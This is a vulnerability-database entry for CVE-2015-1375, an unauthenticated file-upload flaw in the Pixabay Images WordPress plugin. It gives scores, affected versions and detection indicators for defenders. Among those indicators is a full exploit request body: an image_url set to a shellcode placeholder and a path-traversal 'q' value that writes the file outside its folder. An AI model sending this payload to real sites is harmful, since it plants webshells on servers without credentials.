cbcvebase.
CVE-2015-1375
published 2015-01-28

CVE-2015-1375: pixabay-images.php in the Pixabay Images plugin before 2.4 for WordPress does not properly restrict access to the upload functionality, which allows remote…

PriorityP264high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
12.25%
95.7th percentile
pixabay-images.php in the Pixabay Images plugin before 2.4 for WordPress does not properly restrict access to the upload functionality, which allows remote attackers to write to arbitrary files.

Affected

1 ranges
VendorProductVersion rangeFixed in
pixabay_images_projectpixabay_images<= 2.3

Detection & IOCsextracted from sources · hover to see the quote

path/wp-admin/
pathpixabay-images.php
commandpixabay_upload=1&image_url=<shellcode_url>&image_user=none&q=xxx/../../../../../../mogwai
  • Look for unauthenticated POST requests to /wp-admin/ containing the parameter 'pixabay_upload=1', which indicates exploitation of the authentication bypass combined with arbitrary file upload.
  • Detect path traversal attempts via the 'q' POST parameter containing sequences such as '../../' targeting the Pixabay Images plugin upload functionality.
  • Monitor for POST requests with Content-Type 'application/x-www-form-urlencoded' to /wp-admin/ containing both 'pixabay_upload' and 'image_url' parameters, especially where image_url points to an external or attacker-controlled host serving PHP files.
  • The plugin does not validate the host in the provided download URL; alert on 'image_url' values referencing non-Pixabay domains, particularly those ending in .php.
  • ·The authentication bypass means exploitation requires NO valid WordPress credentials; any unauthenticated remote attacker can trigger the upload endpoint.
  • ·Path traversal via the 'q' parameter allows files to be written outside the intended 'download' folder, meaning uploaded shells may land anywhere on the filesystem accessible to the web server.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.